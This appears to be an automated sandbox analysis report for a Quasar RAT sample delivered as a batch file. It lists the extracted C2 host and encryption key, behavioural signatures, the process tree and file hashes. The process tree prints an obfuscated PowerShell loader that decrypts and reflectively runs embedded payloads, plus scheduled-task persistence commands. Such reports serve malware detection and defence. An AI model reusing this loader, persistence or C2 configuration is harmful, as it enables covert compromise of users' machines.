Analysis
max time kernel: 42s
max time network: 36s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240426-en locale:en-us os:windows10-2004-x64 system
submitted: 14-05-2024 23:36
Static task: static1
Behavioral task: behavioral1 (Sample: Uni.bat, Resource: win7-20240508-en)
Behavioral task: behavioral2 (Sample: Uni.bat, Resource: win10-20240404-en)
Behavioral task: behavioral3 (Sample: Uni.bat, Resource: win10v2004-20240426-en)
General
Target: Uni.bat
Size: 515KB
MD5: 4c2a3be3d5c9464eb441677e41f44fd8
SHA1: c826034a0882d21a39056d745e88622ee9698343
SHA256: 45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
SHA512: ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
SSDEEP: 12288:OOCZeIh9XQFAbCbtqTUGLYPSow/QWEO2b:4zh9+3tZGEw/b2b
Malware Config
Extracted
Family: quasar
Version: 3.1.5
SLAVE
review-tops.gl.at.ply.gg:48212
$Sxr-IGnkORFTlshRl7BdTw
encryption_key: YDmRBA8wExjQkYgGrHhN
install_name: $sxr-powershell.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: Discord
subdirectory: $77
Signatures
Quasar payload 1 IoCs
Processes:
- resource behavioral3/memory/3964-79-0x0000000006E80000-0x0000000006EEC000-memory.dmp, yara_rule family_quasar
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
- PID 2028 created 608: powershell.EXE (PID 2028), target process winlogon.exe
Blocklisted process makes network request 3 IoCs
Processes:
- flow 24: powershell.exe (PID 3964)
- flow 26: powershell.exe (PID 3964)
- flow 30: powershell.exe (PID 3964)
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
- powershell.exe (PID 2572)
- powershell.exe (PID 3384)
- powershell.exe (PID 3964)
Downloads MZ/PE file
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate (wmiprvse.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (wmiprvse.exe)
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
- Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation (WScript.exe)
Executes dropped EXE 2 IoCs
Processes:
- $sxr-powershell.exe (PID 548)
- install.exe (PID 1092)
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 23: ip-api.com
Drops file in System32 directory 8 IoCs
Processes:
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx (svchost.exe)
- File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx (svchost.exe)
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan (svchost.exe)
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work (svchost.exe)
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work (svchost.exe)
- File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work (svchost.exe)
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.EXE)
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log (powershell.EXE)
Suspicious use of SetThreadContext 1 IoCs
Processes:
- PID 2028 set thread context of 3984: powershell.EXE (PID 2028), target process dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes: wmiprvse.exe
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
- Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (mousocoreworker.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (mousocoreworker.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (mousocoreworker.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 (mousocoreworker.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier (mousocoreworker.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (mousocoreworker.exe)
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (mousocoreworker.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (mousocoreworker.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier (wmiprvse.exe)
Modifies data under HKEY_USERS 49 IoCs
Processes: mousocoreworker.exe, powershell.EXE, svchost.exe
Modifies registry class 5 IoCs
Processes:
- Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable (RuntimeBroker.exe)
- Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp (RuntimeBroker.exe)
- Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed (RuntimeBroker.exe)
- Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory (RuntimeBroker.exe)
- Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings (powershell.exe)
Processes:
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data not captured in this extract) ($sxr-powershell.exe)
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data not captured in this extract) ($sxr-powershell.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 ($sxr-powershell.exe)
Runs net.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: powershell.exe (PIDs 2572, 3384, 3964), $sxr-powershell.exe (PID 548), powershell.EXE (PID 2028), dllhost.exe (PID 3984)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: powershell.exe (PIDs 2572, 3384)
Suspicious use of WriteProcessMemory 64 IoCs
Processes: cmd.exe, net.exe, powershell.exe, WScript.exe, powershell.EXE, dllhost.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Process tree ([1] = top-level process, [2] = child of the nearest preceding [1] entry); signatures triggered by a process are listed beneath it.
- [1] C:\Windows\system32\winlogon.exe
  Command line: winlogon.exe
- [2] C:\Windows\system32\dwm.exe
  Command line: "dwm.exe"
- [2] C:\Windows\System32\dllhost.exe
  Command line: C:\Windows\System32\dllhost.exe /Processid:{303e1b26-3a19-47f2-aad5-23d7db68d203}
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
- [1] C:\Windows\system32\lsass.exe
  Command line: C:\Windows\system32\lsass.exe
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in System32 directory
- [2] C:\Windows\system32\taskhostw.exe
  Command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
- [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "<obfuscated PowerShell script removed>"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  - Drops file in System32 directory
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
- C:\Windows\system32\sihost.exe (level 2)
  Command line: sihost.exe
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
- C:\Windows\System32\spoolsv.exe (level 1)
  Command line: C:\Windows\System32\spoolsv.exe
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
- C:\Windows\sysmon.exe (level 1)
  Command line: C:\Windows\sysmon.exe
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- C:\Windows\system32\wbem\unsecapp.exe (level 1)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
- C:\Windows\Explorer.EXE (level 1)
  Command line: C:\Windows\Explorer.EXE
- C:\Windows\system32\cmd.exe (level 2)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\net.exe (level 3)
  Command line: net file
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\net1.exe (level 4)
  Command line: C:\Windows\system32\net1 file
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3)
  Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 4)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_989_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_989.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\WScript.exe (level 4)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_989.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\cmd.exe (level 5)
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_989.bat" "
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\net.exe (level 6)
  Command line: net file
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\net1.exe (level 7)
  Command line: C:\Windows\system32\net1 file
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 6)
  Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_989.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_989.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\schtasks.exe (level 7)
  Command line: "schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
  - Creates scheduled task(s)
- C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe (level 7)
  Command line: "C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe"
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
- C:\Windows\System32\Conhost.exe (level 8)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- C:\Users\Admin\AppData\Local\Temp\install.exe (level 7)
  Command line: "C:\Users\Admin\AppData\Local\Temp\install.exe"
  - Executes dropped EXE
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
- C:\Windows\system32\DllHost.exe (level 1)
  Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- C:\Windows\System32\RuntimeBroker.exe (level 1)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Modifies registry class
- C:\Windows\System32\RuntimeBroker.exe (level 1)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  - Modifies data under HKEY_USERS
- C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (level 1)
  Command line: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- C:\Windows\system32\SppExtComObj.exe (level 1)
  Command line: C:\Windows\system32\SppExtComObj.exe -Embedding
- C:\Windows\System32\svchost.exe (level 1)
  Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
- C:\Windows\system32\DllHost.exe (level 1)
  Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- C:\Windows\System32\RuntimeBroker.exe (level 1)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe (level 1)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe (level 1)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\WaaSMedicAgent.exe (level 1)
  Command line: C:\Windows\System32\WaaSMedicAgent.exe d72ea9721f25e85977829f815956e0a6 WbXx2TyFNkCqj/CtXs7HVg.0.1.0.0.0
- C:\Windows\System32\Conhost.exe (level 2)
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
- C:\Windows\system32\wbem\wmiprvse.exe (level 1)
  Command line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  - Checks BIOS information in registry
  - Checks SCSI registry key(s)
  - Enumerates system info in registry
- C:\Windows\sysWOW64\wbem\wmiprvse.exe (level 1)
  Command line: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
- C:\Windows\servicing\TrustedInstaller.exe (level 1)
  Command line: C:\Windows\servicing\TrustedInstaller.exe
- C:\Windows\system32\svchost.exe (level 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
- C:\Windows\System32\mousocoreworker.exe (level 1)
  Command line: C:\Windows\System32\mousocoreworker.exe -Embedding
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 55d32bc1c206428fe659912b361362de
  SHA1: 7056271e5cf73b03bafc4e616a0bc5a4cffc810f
  SHA256: 37bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff
  SHA512: 2602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 17KB
  MD5: 7eaeaf6bfd54799a8c15b2cf0c6f6683
  SHA1: 4238058d1ef94e3ce9bb0a6133ccd16fa7df390b
  SHA256: 4f7ae38acd9e5de90f0ce83486e3d6804e570c3b750838c42c9872b56e11f503
  SHA512: 07ee6c01404a945b5285984f4b73046325b2031b6d8632ce68d4dee0ff14e9bfd1a19268f4de5816316119a5c53944fbad103f1288eb6b4ef94425831e9b3c3c
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ghqdu34h.luu.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Users\Admin\AppData\Local\Temp\install.exe
  Filesize: 162KB
  MD5: 152e3f07bbaf88fb8b097ba05a60df6e
  SHA1: c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
  SHA256: a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
  SHA512: 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
- C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe
  Filesize: 423KB
  MD5: c32ca4acfcc635ec1ea6ed8a34df5fac
  SHA1: f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
  SHA256: 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
  SHA512: 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
- C:\Users\Admin\AppData\Roaming\startup_str_989.bat
  Filesize: 515KB
  MD5: 4c2a3be3d5c9464eb441677e41f44fd8
  SHA1: c826034a0882d21a39056d745e88622ee9698343
  SHA256: 45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
  SHA512: ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
- C:\Users\Admin\AppData\Roaming\startup_str_989.vbs
  Filesize: 115B
  MD5: 0b3bda6ffdd71ff9dd00514a34179cf6
  SHA1: 565b45f04f7479f230a9996678243aaef3100664
  SHA256: 9a59ab294ccbce72f42c2c00d73c96ca5659d1296e0e96bb60adca192664c6ad
  SHA512: 4bf8d9cb3d6317bdec522f0609b24dc8750b0aad258990c779cfb311e8d0a3bb462b2306bbf6a2bd89ac6aaa4f13dfd51c811e2495d7548e94223a21a265420a
- C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
  Filesize: 2KB
  MD5: 8abf2d6067c6f3191a015f84aa9b6efe
  SHA1: 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
  SHA256: ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
  SHA512: c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
- C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
  Filesize: 2KB
  MD5: f313c5b4f95605026428425586317353
  SHA1: 06be66fa06e1cffc54459c38d3d258f46669d01a
  SHA256: 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
  SHA512: b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
- C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
  Filesize: 2KB
